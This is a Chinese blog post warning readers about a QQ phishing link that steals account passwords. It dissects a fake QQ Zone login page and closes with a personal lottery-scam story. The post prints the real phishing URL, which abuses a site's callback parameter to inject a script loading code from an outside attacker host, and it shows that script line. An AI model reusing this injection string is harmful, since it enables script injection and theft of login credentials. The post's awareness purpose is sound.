前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >不要再被骗了------QQ盗号原理大揭秘

不要再被骗了------QQ盗号原理大揭秘

作者头像
Angel_Kitty
发布于 2018-07-04 03:55:17
发布于 2018-07-04 03:55:17
5.7K00
代码可运行
举报
运行总次数:0
代码可运行

前言

相信大家在懵懂无知的时候都有被盗号的经历吧,QQ胡乱的加好友,突然有个好友传了个文件给你,打开以后发现QQ竟然显示强制下线,然后再也上不去了QAQ,很明显,QQ号被人盗了。最近也是很多小伙伴私信我,也看了一些人发空间说QQ号被盗了啥的,以及我自己收到的一些诈骗请求。网上针对防骗这块的文章几乎没有,为了不让更多的人受害,下面我将会以最真实朴素的语言介绍最常见的一种盗号诈骗方式,浅析一下这个盗号原理的全过程~~~希望大家不要再上当受骗啦~!

正文

下面我给大家介绍一种最常见的QQ诈骗方式。

这个是我今早收到的一条链接,相信不少朋友肯定也收到类似的链接吧,甚至乎很多人都说因为点开这个链接被盗号吧。。。只有不懂安全,没用安全意识的人才会这么说吧!!!

让我带大家来剖析一下这个东东吧~~~

很明显,你看这个域名看不出任何眉头,既然大家都不敢点,我就替大家点点看~~~

首先我们在手机端点开这个链接

点开一看,我们可以看到,是一个QQ空间登录界面,这个界面就是一个欺骗用户的界面,为什么这么说呢,你把这个界面链接复制出来,用浏览器打开,你会发现网页无法打开,并且域名成了下面这个:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://sdk.h5.gamedog.cn/apih5v2/getIsLogin/?callback=%00%00%00%00%00%00%00%3CscripT/src%3D//p10t.cn/app.php%3Faid%3D5%3E%3C/scripT%3E%3C!--&bqvoqvwqtujhigzkumjk.png

看样子域名被浏览器解析成了一张png图片,你可能会有点好奇这个,我们用pc端按照这个地址进行追踪,用F12查看网页源代码

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<scripT/src=//p10t.cn/app.php?aid=5></scripT><!--({"code":-2,"msg":"\u7528\u6237\u672a\u767b\u5f55"})

就只有这么一行,我们可以看到从登录页面输入完账号密码以后会跳转到一个app.php网页里面,我们循规蹈矩,直接去追踪访问那个界面

有点意思,网页从QQ空间进行跳转的

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
window.location.href = "http://qzone.qq.com";

学过JavaScript的朋友应该知道,location.href="网站链接",表示重新定向到新页面,同时刷新打开的这个页面;

这个意思是从一个伪QQ空间的页面上输入账户密码,这个页面被植入了php的恶意木马,通过跳转重定向,直接跳转到了木马网站去了,后台数据库并记录了这条信息,然后你的QQ号账户密码就被别人成功获取了~~~

如果不信的话,我们可以一起来试一试

首先输入账号密码。。。我们就随便伪造一个,账号是3838438,密码就写一个mmpsbsbsb试试看!!!

这里还要说一点,我试的时候这里好像做的还挺真实的,防中文输入,我本来想直接开口大骂呢,hhhh,没给我这个机会。。。

这里无论输入什么账号密码都可以过,除了中文无法检测,账号必须是一连串的数字,密码防了中文输入。

然后我点击登录

看吧,直接就登录成功了,还有这张图片,这这这。。。完全就是挑衅啊,竟然贴一张小狗的图片,是在考验我智商嘛?

我尝试了一下ping它的主页,ping p10t.cn

ping通了,说明这个网站还活着。

但是登录页面显示403错误,服务器拒绝访问,我不是很清楚如何绕过这一防线。

那我也没辙了,技术不够精湛,我只能写下这篇文章记录一下,希望更多的人看到,不要再上当受骗了就好~~~

如果文章哪里写的有出路的地方,希望各位不吝赐教,如果有更好的解决方案,欢迎在评论区留言或私信给我,感谢大家的支持~~~

关于其他类型的诈骗

可能有些人遇到一些其他的诈骗,比如电话诈骗,短信诈骗,讲一个最真实的例子,推荐你们看一部电影,叫嘉年华,里面讲述的是关于电信诈骗的案件,这部电影是由真实事件改编而成的,非常推荐大家观看,里面有一些防诈骗的技巧,看完以后你会对常见的诈骗手段有了一个更深层次的了解。

如果没有找到资源的小伙伴,我也会在文章中分享给你们一个百度云链接,保存以后下载观看即可:链接:https://pan.baidu.com/s/1CrYJ9jtkSqqxzZSlzQTsqA 密码:2qlz

说这么多,可能大家会认为我在吹牛皮,认为这些事情不会发生在自己身上。我讲一个最真实的例子,我母亲因为前段时间地上见到一张彩票,刮开奖说中了10w块钱,我身在一个并不宽裕的家庭,按照现在的话来讲,算是贫农家庭,还远没达到小康水平,想想看,10w块钱从天而降,对于我们这种家庭,这绝对算是一笔相当的财富,当时我妈拿着彩票回家,和我还有我爸商量来着,我一看说,这肯定是骗局吧,这么好的事情为什么偏偏出现在我们身上,天上不会掉馅饼,努力奋斗才能梦想成真,我妈偏不信这个邪,想去试一试,然后拨打了上面的电话,上面巴拉巴拉说了一大堆,意思就是要交3000块钱税钱啥的,然后才能兑换这个钱,你看,这不明显是骗局嘛,我妈又觉得,如果得到了这个钱,相当于她少上多少年的班,其实说白了这一切都是为了这个不争气的我,我其实也是很愧疚的。所以朋友们要记住,只要谈到钱这个问题,要悠着点,十有八九都是骗局,我妈最后是按照地址打钱过去了,然后事实上,对方并没有想要兑换的意思,巴拉巴拉说了一大堆,好像又是要交钱。。。我妈现在才意识到被骗了,然后跑到警局报了案,警方说,你不是第一个了,关于彩票中奖被骗的人一大堆,他们说没有足够的证据线索,立不了案,没办法了,3k被狗吃了,这可是辛辛苦苦东奔西跑的血汗钱,这些骗子也是一点良心都没有,所以。。。后来我励志要当一名网警,要把这些逍遥法外的人绳之以法,天网恢恢疏而不漏,这些人最终一定逃不了法律的制裁的。

后记

关于盗号这一问题,我给大家提醒两句,只要少一点好奇心,少一点贪欲,多一点警惕之心,不管是什么类型的诈骗都不会出现在你身上,谨记哦。。。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2018-07-01 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
不要再被骗了——QQ盗号原理大揭秘
相信大家在懵懂无知的时候都有被盗号的经历吧,QQ胡乱的加好友,突然有个好友传了个文件给你,打开以后发现QQ竟然显示强制下线,然后再也上不去了QAQ,很明显,QQ号被人盗了。最近也是很多小伙伴私信我,也看了一些人发空间说QQ号被盗了啥的,以及我自己收到的一些诈骗请求。网上针对防骗这块的文章几乎没有,为了不让更多的人受害,下面我将会以最真实朴素的语言介绍最常见的一种盗号诈骗方式,浅析一下这个盗号原理的全过程~~~希望大家不要再上当受骗啦~!
全栈程序员站长
2022/07/04
3.8K1
不要再被骗了——QQ盗号原理大揭秘
2017年网络诈骗趋势研究报告
摘要 2017年猎网平台共收到全国用户提交的有效网络诈骗举报24260例,举报总金额3.50亿余元,人均损失14413.4元。与2016年相比,网络诈骗的举报数量增长了17.6%,人均损失却增长了52.2%。 从用户举报数量来看,虚假兼职诈骗是举报数量最多的类型,共举报3804例,占比15.7%;其次是金融理财3667例(15.1%)、虚假购物3479例(14.3%)、虚拟商品2688例(11.1%)、网游交易2606例(10.7%)。 从举报总金额来看,金融理财类诈骗同样是举报总金额最高,达1.8亿元,占
FB客服
2018/02/23
1.8K0
2017年网络诈骗趋势研究报告
杀毒软件揭秘网络彩票骗局:背后竟是一条龙服务
随着互联网的发展,民众的生活日益数字化,这也为不法分子提供了可趁之机。多年来,网络诈骗愈演愈烈,虚假购物、虚假兼职和虚假中奖等诈骗手段屡屡被媒体曝光。近段时间,不少网民向公安机关报案,声称自己在网站购买彩票时遭遇骗局,非法彩票网站的诈骗行为逐渐浮出水面。非法彩票平台究竟是如何一步步诱骗受害者上当的呢?
互联资讯
2018/06/11
3.7K2
杀毒软件揭秘网络彩票骗局:背后竟是一条龙服务
放心吧,这些坑我们都帮你踩过了
年底了,总结起小助手的这一年,除了偶尔焦虑“日渐消瘦的钱包和直线上涨的体重”,一切还算顺遂。这一年,虽然钱没赚多少,但故事却听了不少,与坏人斗智斗勇的经验值也是蹭蹭直升,算是小有收获。
腾讯举报中心
2020/02/25
8910
记一次网络诈骗追踪过程
本文素材均来源于真实事件,有关细节因隐私问题暂时隐去。事件是近日的某天,一位朋友通过微信联系到我,当时我正沉浸在LOL被坑的苦恼中…… 一开始我以为是咸鱼交易纠纷问题,那么这种情况就直接淘宝客服介入就
FB客服
2018/02/26
2.2K1
记一次网络诈骗追踪过程
手把手教大家如何解决QQ被盗的风险。
  这种情况在QQ群里面见的多。通常是发送一些具有诱惑性的链接诱导你去点击。也可能会是一些二维码,如下图。为了做这期,能更好的了解其盗号的手段,我把凡是我看到的盗号链接都点了个遍,那些恶意二维码我也扫了个遍。这是我在了解其原理并做了相应的安全措施前提下做的,小伙伴们千万不要去乱点乱扫。
知识与交流
2024/06/03
9240
手把手教大家如何解决QQ被盗的风险。
去世、盗号、封号……QQ钱包里的钱怎么办!
企鹅号小编
2017/12/27
3.4K0
去世、盗号、封号……QQ钱包里的钱怎么办!
记录一次入侵某钓鱼盗号网站的过程
很明显这就是一个收集QQ账号密码的,当然了这只是对我来说... 很多不是相关专业的朋友打开这样的链接也看不出和官方的区别。这里给大家分享一下如何辨别类似的假冒网站吧。1、 按理说要在中国大陆内搭建网站都是需要备案的,如果面向国内业务的网站没有备案,那百分之90都不是正规。点我查询网站备案信息 2、看域名后缀,如果类似这种cfd、xyz、top之类的 没几个大公司用这种域名,因为便宜,骗子们用完就丢了。大部分都是com、cn、net、org等
天方
2022/10/28
9220
开启QQ登录保护仍被盗号——QQ安全机制全面分析[通俗易懂]
周围总是有些同学QQ被盗号,攻击者盗取账号后会继续去欺骗列表里的好友,形成链式反应。危害比较大。
全栈程序员站长
2022/06/28
4.2K0
开启QQ登录保护仍被盗号——QQ安全机制全面分析[通俗易懂]
针对网贷诈骗行业诈骗链分析
1.1某天,一位网上朋友告诉笔者,他被骗了。被骗方式很独特,因为自己没钱所以选择贷款,在贷款过程中惨遭诈骗。 1.2诈骗短信:
亿人安全
2022/06/30
7920
针对网贷诈骗行业诈骗链分析
网络钓鱼常用手段大揭秘,超级科技教你如何防范
大家好,我是信息化安全解决方案专家超级科技,对于年后找工作的人来说,LinkedIn是必不可少的网站,上面的联系人不是同学就是同事或者是彼此有某种关联的人。这一点也很容易被网络钓鱼的犯罪分子所利用。近日就有研究人员发现,黑客利用LinkedIn 账户的私信和 InMail 功能发送钓鱼链接。
超级科技
2021/02/21
2.2K0
网络钓鱼常用手段大揭秘,超级科技教你如何防范
移动网络骗局典型案例—-防骗指南
节选自《2017年中国手机安全状况报告》,原文较长,安智客整理编辑了一下。 网络诈骗的方法一直在更新换代,但是万变不离其宗,仔细研究后就会发现有些核心环节都是一脉相承的。所以,对网络诈骗案例的研究能够让我们从中汲取经验教训,从而达到举一反三的效果。为此,我们从2017年的案例中精心挑选出以下案例,为用户讲述骗子的作案手法,帮助用户提升鉴别能力。 一、 购物退款诈骗 案例回放: 受害人赵先生,也是接到一个声称是淘宝客服的电话,该“客服”告诉受害人购买的衣服(核对店铺名称、衣服信息正确),因为指标严重超出,淘宝
安智客
2018/04/19
2.4K0
移动网络骗局典型案例—-防骗指南
网传搜狐遭遇史诗级邮件诈骗,张朝阳回应来了
近日,关于“搜狐员工遭遇了史诗级电子邮件诈骗,大量员工工资卡被清零”在互联网上传的沸沸扬扬。
FB客服
2022/06/08
3870
网传搜狐遭遇史诗级邮件诈骗,张朝阳回应来了
从扫码登录的原理分析QQ大量被盗事件
6 月 26 号晚上,大量 QQ 被盗的新闻一度冲上微博热搜。很多人反映自己的 QQ 不受控制地发送大量违规图片。
CoderW
2022/07/13
2.4K0
从扫码登录的原理分析QQ大量被盗事件
你有一份春节防电信网络诈骗指南,请查收!
在北京工作的王先生因买不到春节回湖南老家的火车票,决定试试火车票代购。买票心切的王先生了解相关代购流程后,马上按要求提交了姓名与身份证号码。对方收到王先生的个人信息后很快发来了抢票成功的订单截图。
腾讯举报中心
2020/02/25
4310
电信骗子的“内应”在哪里?
(图片来源:http://news.rugao35.com/newsshow-172719.html)
王树义
2018/08/22
7720
电信骗子的“内应”在哪里?
你不知道网络安全有多严峻
随着大数据、AI(人工智能)与互联网络的高速发展新的网络安全问题变得越来越严峻,自己身边时不时总有人被网络诈骗,为了更少的人被攻击写了这些文字。
张果
2018/07/31
3.2K0
你不知道网络安全有多严峻
【实战】你的QQ就是这样被盗的|防范网络钓鱼
以前在qq上就收到过朋友发来的二维码链接啥的,一般的套路就是诱导你扫描这个二维码或者点击这个链接。 例如某天爱玩吃鸡的你收到一条链接,标题是点击领取金币领皮肤领…然后你兴奋的不行,点开之后让你输入账号密码登录,你看着这个页面,没有发现半点可疑的地方,然后就把账号密码随手输了进去。不一会儿,你的qq提示在其他地方登录,然后你列表的好友就都收到了你发给他们的链接。又比如某天,你收到一条消息/一条空间留言,内容是:这个人的qq空间里怎么有你的照片?又或者是:这个人是谁?为什么他空间有你俩的合影?单纯善良好奇心又巨强的你瞬间懵了,同学?我和谁合过影啊?都忘了,赶紧去看看。但是你点击以后是个qq空间的页面让你登录,合情合理啊,毕竟是qq空间相册,那就登录呗,然后你qq就掉线了。 本文没啥技术含量,因为这几天正好碰到一个钓鱼网站,结合着真实的钓鱼网站打算给朋友们科普一下,提高一下防范意识。
天钧
2019/08/16
1.3K0
【实战】你的QQ就是这样被盗的|防范网络钓鱼
2014年腾讯雷霆行动网络黑色产业链年度报告(下)
二、网络黑产数据研究与分析 1. 疯狂病毒:日均54万手机中毒,支付病毒猛增 数据来源:腾讯手机管家、腾讯电脑管家  2014年腾讯管家安全软件在PC端上发现超过1.3亿个新增病毒,移动端上发现超过
腾讯研究院
2018/02/05
3K0
2014年腾讯雷霆行动网络黑色产业链年度报告(下)
被裸聊、刷单诈骗了,差点人财两空
作为一个混迹于IT行业多年的技术人,以前总是在新闻、电视上面看到各种骗局,总会疑惑这么拙劣的骗局,怎么就会有人上当呢,更有甚者被骗的倾家荡产;可是,最近这一个月时间,身边亲人、朋友被裸聊、刷单给诈骗了;让我气愤和无语之余,一时间,我都不知道是该骂被骗的人人傻钱多呢!还是该骂骗子丧心病狂;
一行Java
2023/01/30
1.6K0
推荐阅读
相关推荐
不要再被骗了——QQ盗号原理大揭秘
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验